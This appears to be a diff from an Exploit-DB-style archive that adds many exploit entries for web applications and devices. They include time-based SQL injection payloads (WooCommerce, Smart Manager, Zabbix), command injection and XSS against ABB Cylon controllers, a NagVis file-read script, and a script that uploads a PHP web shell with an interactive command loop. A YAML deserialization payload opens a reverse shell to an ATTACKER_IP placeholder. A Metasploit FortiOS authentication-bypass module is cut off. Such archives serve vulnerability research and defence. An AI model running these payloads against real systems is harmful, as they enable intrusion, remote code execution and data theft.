Content-Disposition: form-data; name="customer_ids"
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="product_ids"
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="category_ids"
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="min_amount"
0
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="max_amount"
0
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="min_amount_total"
0
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="max_amount_total"
(select*from(select(sleep(20)))a)
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="product_relationship"
or
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="product_category_relationship"
or
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="product_category_filters_relationship"
and
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="statuses"
wc-pending,wc-processing,wc-on-hold,wc-completed,wc-cancelled,wc-refunded,wc-failed,wc-checkout-draft
-----------------------------2461714219322283440478088295--
```
If the server response is delayed by approximately 20 seconds, it indicates a successful exploitation of the time-based SQL Injection, confirming the vulnerability.
## Recommendations
Users of WooCommerce Customers Manager v29.4 are strongly advised to restrict access to the affected endpoint and update the plugin as soon as a fixed version is released. This advisory serves as a notice to all users of Smart Manager v8.27.0 to take immediate action in updating their plugin to protect against this SQL Injection vulnerability.

View file

@ -0,0 +1,79 @@
# Exploit title : ABB Cylon Aspect 4.00.00 (factorySetSerialNum.php) Remote Code Execution
# Vendor: ABB Ltd.
# Product web page: https://www.global.abb
# Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=4.00.00
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an unauthenticated
blind command injection vulnerability. Input passed to the serial and ManufactureDate
POST parameters is not properly sanitized, allowing attackers to execute arbitrary
shell commands on the system. While factory test scripts included in the upgrade
bundle are typically deleted, a short window for exploitation exists when the device
is in the manufacturing phase.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5894
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5894.php
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ curl http://192.168.73.31/factorySetSerialNum.php \
> -d "serial=;sleep 2&ManufactureDate=;sleep 3"

View file

@ -0,0 +1,79 @@
# Exploit title: ABB Cylon Aspect 4.00.00 (factorySaved.php) Unauthenticated XSS
# Vendor: ABB Ltd.
# Product web page: https://www.global.abb
# Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=4.00.00
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an unauthenticated
reflected cross-site scripting vulnerability in the 'title' GET parameter.
Input is not properly sanitized before being returned to the user, allowing
the execution of arbitrary HTML/JS code in a user's browser session in the
context of the affected site. While the factory test scripts included in the
upgrade bundle are typically deleted, a short window for exploitation exists
when the device is in the manufacturing phase.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5893
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5893.php
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ http://192.168.73.31/factorySaved.php?title=<script>console.log('ZSL')</script>

View file

@ -0,0 +1,83 @@
# Exploit title: ABB Cylon Aspect 3.08.03 (webServerDeviceLabelUpdate.php) File Write DoS
# Vendor: ABB Ltd.
# Product web page: https://www.global.abb
# Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.03
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an authenticated
arbitrary content injection vulnerability in the webServerDeviceLabelUpdate.php
script due to a lack of input validation. Authenticated attackers can exploit
the 'deviceLabel' POST parameter to write arbitrary content to a fixed file
location at /usr/local/aam/etc/deviceLabel, potentially causing a denial of
service.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5892
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5892.php
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ curl http://192.168.73.31/webServerDeviceLabelUpdate.php \
> -H "Cookie: PHPSESSID=xxx" \
> -d "deviceLabel=`printf '%.0sA' {1..10000}`"\
> # --data-urlencode "deviceLabel@largecontent.txt"
$ curl http://192.168.73.31/webServerConfiguration.php | grep AAA

View file

@ -0,0 +1,28 @@
# Exploit Title: phpMyFAQ 3.1.7 - Reflected Cross-Site Scripting (XSS)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/thorsten/phpMyFAQ
# Software Link: https://github.com/thorsten/phpMyFAQ
# Version: 3.1.7
# Tested on: Ubuntu Windows
# CVE : CVE-2022-4407
PoC:
Get: http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>
Details:
{
"Sink": "phpmyfaq/admin/header.php - HTML attribute in the form action parameter",
"Vulnerable Variable": "action",
"Source": "phpmyfaq/admin/index.php - Filter::filterInput(INPUT_GET, 'action', FILTER_UNSAFE_RAW)",
"Sanitization Mechanisms Before Patch": "None - Input directly used without escaping or encoding in the HTML attribute",
"Sink Context Constraints": "HTML attribute context - needs proper escaping to break out of attribute",
"Attack Payload": "\"><script>alert('XSS')</script>",
"Execution Path Constraints": "The 'action' parameter must be passed via GET or POST without prior sanitization or if it is null, it must be taken from 'redirect-action' parameter unless it equals 'logout'",
"Request Parameters": "action",
"Request URL": "http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>",
"Request Method": "GET",
"Final PoC": "http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>"
}
[Replace Your Domain Name]

74
exploits/php/webapps/52229.py Executable file
View file

@ -0,0 +1,74 @@
# Exploit Title: NagVis 1.9.33 - Arbitrary File Read
# Date: 03/12/2024
# Exploit Author: David Rodríguez a.k.a. xerosec
# Vendor Homepage: https://www.nagvis.org/
# Software Link: https://www.nagvis.org/downloads/archive
# Version: 1.9.33
# Tested on: Linux
# CVE: CVE-2022-46945
import requests
import argparse
import json
from urllib.parse import urljoin
def authenticate(target_url, username, password):
url = urljoin(target_url, '/nagvis/frontend/nagvis-js/index.php')
headers = {"User-Agent": "Mozilla/5.0", "Content-Type": "application/x-www-form-urlencoded"}
data = {"_username": username, "_password": password, "submit": "Login"}
try:
response = requests.post(url, headers=headers, data=data)
if response.status_code == 200 and "Set-Cookie" in response.headers:
print("[✔] Authentication successful.")
return response.headers["Set-Cookie"]
print(f"[✘] Authentication failed. Status code: {response.status_code}")
except Exception as e:
print(f"[✘] Request error: {e}")
return None
def exploit(target_url, session_cookie, file_path):
url = urljoin(target_url, '/nagvis/server/core/ajax_handler.php')
headers = {"User-Agent": "Mozilla/5.0", "Cookie": session_cookie}
params = {"mod": "General", "act": "getHoverUrl", "url[]": f"file://{file_path}"}
try:
response = requests.get(url, headers=headers, params=params)
if response.status_code == 200:
print("[✔] Exploitation successful. File content:\n")
display_file_content(response.text)
else:
print(f"[✘] Exploitation failed. Status code: {response.status_code}")
except Exception as e:
print(f"[✘] Request error: {e}")
def display_file_content(raw_response):
try:
data = json.loads(raw_response)
if isinstance(data, list) and len(data) > 0 and isinstance(data[0], dict) and "code" in data[0]:
content = data[0]["code"]
# Decodificar escapes de manera segura
content = content.encode('utf-8').decode('unicode_escape')
print(content.strip())
else:
print("[✘] Unexpected JSON structure.")
except json.JSONDecodeError as jde:
print(f"[✘] JSON decoding error: {jde}")
except Exception as e:
print(f"[✘] Unexpected error during output processing: {e}")
def main():
parser = argparse.ArgumentParser(description="Exploit for CVE-2022-46945 (File Read Vulnerability)")
parser.add_argument("-t", "--target", required=True, help="Target base URL (e.g., http://10.0.2.132)")
parser.add_argument("-u", "--username", required=True, help="Username for authentication")
parser.add_argument("-p", "--password", required=True, help="Password for authentication")
parser.add_argument("-f", "--file", required=True, help="File path to read (e.g., /etc/passwd)")
args = parser.parse_args()
session_cookie = authenticate(args.target, args.username, args.password)
if session_cookie:
exploit(args.target, session_cookie, args.file)
if __name__ == "__main__":
main()

63
exploits/php/webapps/52230.py Executable file
View file

@ -0,0 +1,63 @@
# Exploit Title: Zabbix 7.0.0 - SQL Injection
# Date: 06/12/2024
# Exploit Author: Leandro Dias Barata @m4nb4
# Vendor Homepage: https://www.zabbix.com/
# Software Link: https://support.zabbix.com/browse/ZBX-25623
# Version: 6.0.0 - 6.0.31 / 6.0.32rc1 6.4.0 - 6.4.16 / 6.4.17rc1 7.0.0
# Tested on: Kali Linux kali-linux-2024.3
# CVE: CVE-2024-42327
import requests
import argparse
HEADERS = {"Content-Type": "application/json"}
def main():
parser = argparse.ArgumentParser(description="CHECK for CVE-2024-42327")
parser.add_argument("-t", "--target", required=True, help="API URL")
parser.add_argument("-u", "--username", required=True, help="Username")
parser.add_argument("-p", "--password", required=True, help="Password")
args = parser.parse_args()
url = f"{args.target.rstrip('/')}/api_jsonrpc.php"
# Login to get the token
login_data = {
"jsonrpc": "2.0",
"method": "user.login",
"params": {"username": args.username, "password": args.password},
"id": 1,
"auth": None
}
try:
login_response = requests.post(url, json=login_data, headers=HEADERS)
login_response.raise_for_status()
auth_token = login_response.json().get("result")
# Simple SQLi test
data = {
"jsonrpc": "2.0",
"method": "user.get",
"params": {
"selectRole": ["roleid", "name", "type", "readonly AND (SELECT(SLEEP(5)))"],
"userids": ["1", "2"]
},
"id": 1,
"auth": auth_token
}
test_response = requests.post(url, json=data, headers=HEADERS)
test_response.raise_for_status()
if "error" in test_response.text:
print("[-] NOT VULNERABLE.")
else:
print("[!] VULNERABLE.")
except requests.RequestException as e:
print(f"[!] Request error: {e}")
if __name__ == "__main__":
main()

View file

@ -0,0 +1,45 @@
# Exploit Title: phpMyFAQ v3.2.10 - Unintended File Download Triggered by Embedded Frames
# Date: 13 Dec 2024
# Exploit Author: George Chen
# Vendor Homepage: https://github.com/thorsten/phpMyFAQ/
# Software Link: https://github.com/thorsten/phpMyFAQ/
# Version: v3.2.10
# Tested on: Mac, Win
# CVE : CVE-202455889
*Summary*
A vulnerability exists in the FAQ Record component of
https://github.com/thorsten/phpMyFAQ v3.2.10 where a privileged attacker
can trigger a file download on a victims machine upon page visit by
embedding it in an <iframe> element without user interaction or explicit
consent.
*Details*
In http://localhost/admin/index.php?action=editentry&id=20&lang=en, where a
FAQ record is either created or edited, an attacker can insert an iframe,
as “source code”, pointing to a prior “malicious” attachment that the
attacker has uploaded via FAQ “new attachment” upload, such that any page
visits to this FAQ will trigger an automated download (from the edit
screen, download is automated; from the faq page view as a normal user,
depending on the browser, a pop up confirmation may be presented before the
actual download. Firebox browser, for instance, does not require any
interactions).
[image: image.png]
*PoC*
1. create a new FAQ record and upload a “malicious” file — in my case, I
uploaded an eicar file. Take note of the uri, ie
“index.php?action=attachment&id=2”
2. in the FAQ record, insert a “source code” blob using the “< >” button
3. insert in the following snippet and save FAQ record:
<p><iframe src="index.php?action=attachment&id=2"></iframe></p> [image:
image.png]
4. Once the edit page reloads, the malicious code will be downloaded
onto the local machine without user interaction:[image: image.png]
Advisory:
https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-m3r7-8gw7-qwvc
Disclosure: https://geochen.medium.com/cve-2024-55889-03572ae6c35c

91
exploits/php/webapps/52243.py Executable file
View file

@ -0,0 +1,91 @@
# Exploit Title: Car Rental Project 1.0 - Remote Code Execution
# Date: 1/3/2020
# Exploit Author: FULLSHADE, SC
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/car-rental-project-php-mysql-free-download/
# Version: 1.0
# Tested on: Windows
# CVE : CVE-2020-5509
# ==================================================
# Information & description
# ==================================================
# Car Rental Project v.1.0 is vulnerable to arbitrary file upload since an admin can change the image of a product and the file change PHP code doesn't validate or care what type of file is submitted, which leads to an attack having the ability to upload malicious files. This Python POC will execute arbitrary commands on the remote server.
# ==================================================
# Manual POC
# ==================================================
# Manual POC method
# - Visit carrental > admin login > changeimage1.php
# - Upload a php rce vulnerable payload
# - Visit /carrentalproject/carrental/admin/img/vehicleimages/.php to visit your file
# - Execute commands on the server
# ==================================================
# POC automation script
# ==================================================
import sys
import requests
print("""
+-------------------------------------------------------------+
Car Rental Project v1.0 - Remote Code Execution
FULLSHADE, FullPwn Operations
+-------------------------------------------------------------+
""")
def login():
sessionObj = requests.session()
RHOSTS = sys.argv[1]
bigstring = "\n+-------------------------------------------------------------+\n"
print("+-------------------------------------------------------------+")
print("[+] Victim host: {}".format(RHOSTs))
POST_AUTH_LOGIN = "http://" + RHOSTS + "/carrentalproject/carrental/admin/index.php"
SHELL_UPLOAD_URL = "http://" + RHOSTS + "/carrentalproject/carrental/admin/changeimage1.php"
# login / authentication
payload = {"username": "admin", "password": "Test@12345", "login": ""}
login = sessionObj.post(POST_AUTH_LOGIN, data=payload)
# get response
if login.status_code == 200:
print("[+] Login HTTP response code: 200")
print("[+] Successfully logged in")
else:
print("[!] Failed to authenticate")
sys.exit()
# get session token
session_cookie_dic = sessionObj.cookies.get_dict()
token = session_cookie_dic["PHPSESSID"]
print("[+] Session cookie: {}".format(token))
# proxy for Burp testing
proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
# data for uploading the backdoor request
backdoor_file = {
"img1": (
"1dccadfed7bcbb036c56a4afb97e906f.php",
'<?php system($_GET["cmd"]); ?>',
"Content-Type application/x-php",
)
}
backdoor_data = {"update": ""}
SHELL_UPLOAD_URL = "http://" + RHOSTS + "/carrentalproject/carrental/admin/changeimage1.php"
# actually upload the php shell
try:
r = sessionObj.post(url=SHELL_UPLOAD_URL, files=backdoor_file, data=backdoor_data)
print("[+] Backdoor upload at /carrentalproject/carrental/admin/img/vehicleimages/1dccadfed7bcbb036c56a4afb97e906f.php" + bigstring)
except:
print("[!] Failed to upload backdoor")
# get command execution
while True:
COMMAND = str(input('\033[32m' + "Command RCE >> " + '\033[m'))
SHELL_LOCATION = "http://" + RHOSTS + "/carrentalproject/carrental/admin/img/vehicleimages/1dccadfed7bcbb036c56a4afb97e906f.php"
# get R,CE results
respond = sessionObj.get(SHELL_LOCATION + "?cmd=" + COMMAND)
print(respond.text)
if __name__ == "__main__":
login()

View file

@ -0,0 +1,15 @@
# Exploit Title: KodExplorer 4.52 - Open Redirect
# Date: 2024-11-08
# Exploit Author: Rahad Chowdhury
# Vendor Homepage: https://kodcloud.com/
# Software Link: https://github.com/kalcaddle/KodExplorer/releases/tag/4.52
# Version: 4.52
# Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56
*Steps to Reproduce:*
1. At first visit this url http://target.com/index.php?user/login&link=.
2. Then use any malicious url in link parameter.
3. your link will be look like:
http://target.com/index.php?user/login&link=https://{site}.com
4. login your account and you will redirect to malicious url.

View file

@ -0,0 +1,52 @@
# Exploit Title: Smart Manager 8.27.0 - Post-Authenticated SQL Injection
# Date: 2024-01-18
# Exploit Author: Ivan Spiridonov - xbz0n
# Vendor Homepage: https://www.storeapps.org/
# Software Link: https://www.storeapps.org/product/smart-manager/
# Version: 8.27.0
# Tested on: Ubuntu 22.04
# CVE: CVE-2024-0566
## SQL Injection
The plugin does not properly sanitize and escape a parameter before using it in an SQL statement, leading to an SQL injection exploitable by high-privilege users such as admin.
## Affected Components
- **Plugin:** Smart Manager
- **Version:** 8.27.0
- **Affected Parameters:** 'sort_params%5BsortOrder%5D', 'sort_params%5Bcolumn%5D'
- **Affected Endpoint:** /wp-admin/admin-ajax.php
## Description
The vulnerability is located within the admin AJAX endpoint in the sorting parameters 'sort_params%5BsortOrder%5D' and 'sort_params%5Bcolumn%5D'. By manipulating these parameters, authenticated attackers can inject SQL commands, leading to a time-based SQL Injection vulnerability.
## Proof of Concept
### Manual Exploitation
```http
POST /wp-admin/admin-ajax.php?action=sm_beta_include_file HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://localhost/wp-admin/admin.php?page=smart-manager
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1117
Origin: http://localhost
Connection: close
Cookie: Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
cmd=get_data_model&active_module=product&security=37e8d818b7&is_public=1&sm_page=1&sm_limit=50&SM_IS_WOO30=true&sort_params%5Bcolumn%5D=postmeta%2Fmeta_key%3D_tax_status%2Fmeta_value%3D_tax_status&sort_params%5BsortOrder%5D=asc%2c(select*from(select(sleep(20)))a)&table_model%5Bposts%5D%5Bpkey%5D=ID&table_model%5Bposts%5D%5Bjoin_on%5D=&table_model%5Bposts%5D%5Bwhere%5D%5Bpost_type%5D%5B%5D=product&table_model%5Bposts%5D%5Bwhere%5D%5Bpost_type%5D%5B%5D=product_variation&table_model%5Bposts%5D%5Bwhere%5D%5Bpost_status%5D=any&table_model%5Bpostmeta%5D%5Bpkey%5D=post_id&table_model%5Bpostmeta%5D%5Bjoin_on%5D=postmeta.post_ID+%3D+posts.ID&table_model%5Bterm_relationships%5D%5Bpkey%5D=object_id&table_model%5Bterm_relationships%5D%5Bjoin_on%5D=term_relationships.object_id+%3D+posts.ID&table_model%5Bterm_taxonomy%5D%5Bpkey%5D=term_taxonomy_id&table_model%5Bterm_taxonomy%5D%5Bjoin_on%5D=term_taxonomy.term_taxonomy_id+%3D+term_relationships.term_taxonomy_id&table_model%5Bterms%5D%5Bpkey%5D=term_id&table_model%5Bterms%5D%5Bjoin_on%5D=terms.term_id+%3D+term_taxonomy.term_id&search_text=&advanced_search_query=%5B%5D&is_view=0&isTasks=0&is_taxonomy=0
```
If the server response is delayed by approximately 20 seconds, it indicates a successful exploitation of the time-based SQL Injection, confirming the vulnerability.
## Recommendations
Users of Smart Manager v8.27.0 are strongly advised to restrict access to the affected endpoint and update the plugin to the latest version.

View file

@ -0,0 +1,31 @@
# Exploit Title: Hugging Face Transformers MobileViTV2 RCE
# Date: 29-11-2024
# Exploit Author: The Kernel Panic
# Vendor Homepage: https://huggingface.co/
# Software Link: https://github.com/huggingface/transformers/releases
# Version: 4.41.1
# Tested on: Linux, Windows, Mac
# CVE : CVE-2024-11392
# Code flow from input to the vulnerable condition:
# 1. The user downloads a third-party ml-cvnet model alongside its configuration file.
# 2. The user runs the convert_mlcvnets_to_pytorch.py script and passes the configuration file to it.
# 3. The convert_mlcvnets_to_pytorch.py script de-serializes the configuration file and executes the malicious code.
# POC
# Create a malicious yaml configuration file called "transformers_exploit.yaml" like shown below.
# Note: Remember to change the 'ATTACKER_IP' and 'ATTACKER_PORT'.
!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('socket').socket(socket.AF_INET, socket.SOCK_STREAM).connect(('ATTACKER_IP', ATTACKER_PORT));import os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ATTACKER_IP',ATTACKER_PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn('/bin/bash')"
# Run the convert_mlcvnets_to_pytorch.py script and pass the transformers_exploit.yaml file to --orig_config_path
> python convert_mlcvnets_to_pytorch.py --orig_checkpoint_path dummy_checkpoint.pt --or
# Note: The dummy_checkpoint.pt can be left as an empty file, dummy_output as an empty directory , and "task" as any of the options metioned in the script.

View file

@ -0,0 +1,16 @@
# Exploit Title: WebMethods Integration Server 10.15.0.0000-0092 - Improper Access on Login Page
# Date: 25-01-2024
# Exploit Author: Rasime Ekici
# Vendor Homepage: www.softwareag.com
# Version: 10.15.0000-0092
# Tested on: 10.15.0000-0092
# CVE : 2024-23733
Description:
The /WmAdmin/,/invoke/vm.server/login login page in the Integration Server in Software AG webMethods 10.15.0 before Core Fix7 allows remote attackers to reach the administration panel,discovering server hostname and version information by sending arbitary username and blank password to the /WmAdmin/#/login/ uri
Interpret the http traffic and send a dummy username with blank password on login screen and drop the request to "/admin/navigation/license" to not logged out.Thus you may able to see:
-real hostname of the installed server
-version info
-administrative api endpoints

279
exploits/windows/remote/52239.py Executable file
View file

@ -0,0 +1,279 @@
# Exploit Title: Fortinet FortiOS, FortiProxy, and FortiSwitchManager 7.2.0 - Authentication bypass
# Date: 2022-10-10
# Exploit Author: Zach Hanley, SC
# Vendor Homepage: https://www.fortinet.com
# Version: 7.0.0
# Tested on: Linux
# CVE : CVE-2022-40684
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::SSH
prepend Msf::Exploit::Remote::AutoCheck
attr_accessor :ssh_socket
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Fortinet FortiOS, FortiProxy, and FortiSwitchManager authentication bypass.',
'Description' => %q{
This module exploits an authentication bypass vulnerability
